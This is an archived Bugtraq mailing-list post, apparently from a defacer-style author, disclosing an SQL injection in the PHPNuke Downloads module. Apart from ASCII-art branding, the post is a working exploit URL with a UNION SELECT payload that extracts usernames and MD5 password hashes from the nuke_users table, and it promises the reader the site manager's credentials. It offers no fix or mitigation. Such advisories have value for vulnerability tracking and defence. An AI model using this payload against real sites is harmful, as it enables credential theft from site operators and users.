Home page logo
/

bugtraq logo Bugtraq mailing list archives

PHPNuke Module's Name Download SQL Injection Vulnerabilities
From: CrAzY_CrAcKeR () phx1-ss-2-lb cnet com
Date: Thu, 5 Apr 2012 19:58:58 GMT

##################################################################
################################################################## 
#
#                       _ _ _ 
#                   .-"      "-.
#                  /            \
#                 |              |
#                 |,  .-.  .-.  ,|
#                 | )(_o/  \o_)( |      
#                 |/     /\     \|           
#       (@_       (_     ^^     _)
#  _     ) \_______\__|IIIIII|__/_______________________________
# (_)@8 () 8{}<________|-\IIIIII/-|________________________________>
#        )_/         \       / 
#       (@     
#
#            +-+-+-+-+-+-+-+-+-+-+
#             --+CrAzY CrAcKeR+--
#            +-+-+-+-+-+-+-+-+-+-+
#
#
################################################################## 
##################################################################
# Example:-
#  
#  [-] www.???.com/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=(sql)
# 
# [-] Injection code.... ( -1+union+select+username,1,user_password,user_id+from+nuke_users )
#     
# [-] 
www.???.com/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1+union+select+username,1,user_password,user_id+from+nuke_users
#     
# [-]  you see  now password (md5) and the name of the site manager
####################################################################
# Greeting to my friend  A7eb Alwrd
####################################################################


  By Date           By Thread  

Current thread:
  • PHPNuke Module's Name Download SQL Injection Vulnerabilities CrAzY_CrAcKeR (Apr 09)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault